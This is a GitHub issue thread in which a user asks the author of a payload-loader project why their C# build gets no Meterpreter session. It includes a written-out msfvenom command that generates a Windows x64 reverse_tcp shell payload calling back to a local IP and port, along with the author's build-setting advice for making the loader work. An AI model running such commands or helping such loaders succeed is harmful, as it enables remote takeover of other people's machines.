### ISSUE TITLE
Error in steps

### ISSUE THREAD

**Issue by armanef7** [DamonMohammadbagher/NativePayload_PE1#1]
Hi, thank you for this technique and please fix my error.
i create payload with this command:
msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.2 lport=4343 -f csharp
 and compile native1 and run in cmd but no access multi handler in msfconsole
please help me . and guide

![232234](https://user-images.githubusercontent.com/123860225/215312718-8fd2ff1e-73c5-4ff2-b75b-2501a96cb06e.PNG)

**Comment by DamonMohammadbagher** [comment]
your project is 32bit so you will get error , make sure your project is 64bit or any cpu, its better => "without 32bit checkbox" and meterperter should be 64bit too and .NET framework in your project for compiling "should be 4.0 or [4.5]"

**Comment by armanef7** [comment]
My project on any cpu and 64bitm but another problem on run command, also i created payload on windows/x64/meterpreter/reverse_tcp
please help thank you
![fzdxfdf](https://user-images.githubusercontent.com/123860225/218300421-d98cd090-4440-4acb-97cb-8cac0dfe7b96.PNG)
